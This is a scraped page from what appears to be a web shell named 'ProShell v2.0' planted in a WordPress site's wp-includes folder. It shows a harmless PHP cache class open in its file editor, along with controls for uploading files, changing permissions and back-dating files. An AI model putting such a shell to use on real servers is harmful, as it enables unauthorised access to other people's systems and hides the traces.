ProShell v2.0
Dashboard
Server Info
Server: 158.106.128.192
PHP: 8.2.33
home
planet5
public_html
bansibaba.com
wp-includes
2026-09-17 06:41:07
Editing: Array.php
Cancel
Save Changes
<?php /** * @package Am_Utils */ class Am_Cache_Backend_Array implements Zend_Cache_Backend_ExtendedInterface { protected $_cache = array(); public function setDirectives($directives) { $this->_directives = $directives; } public function load($id, $doNotTestCacheValidity = false) { if (isset($this->_cache[$id])) return $this->_cache[$id]; return false; } public function test($id) { return isset($this->_cache[$id]); } public function save($data, $label, $tags = array(), $specificLifetime = false) { $this->_cache[$label] = $data; return true; } public function remove($id) { unset($this->_cache[$id]); return true; } public function clean($mode = Zend_Cache::CLEANING_MODE_ALL, $tags = array()) { switch ($mode) { case Zend_Cache::CLEANING_MODE_ALL: // delete all data and all tags $this->_cache = array(); break; } } public function getCapabilities() { return array(); } public function getFillingPercentage() { return 0; } public function getIds() { return array_keys($this->_cache); } public function getIdsMatchingAnyTags($tags = array()) { return array(); } public function getIdsMatchingTags($tags = array()) { return array(); } public function getIdsNotMatchingTags($tags = array()) { return array(); } public function getMetadatas($id) { return array(); } public function getTags() { return array(); } public function touch($id, $extraLifetime) { } public function __sleep() { return array(); } }
Upload Files
Cancel
Upload
Create New
Cancel
Create
Change Permissions
Cancel
Save
Change Date
Cancel
Save
Rename Item
Cancel
Save
Confirm Delete
Are you sure you want to delete the selected items?
Cancel
Delete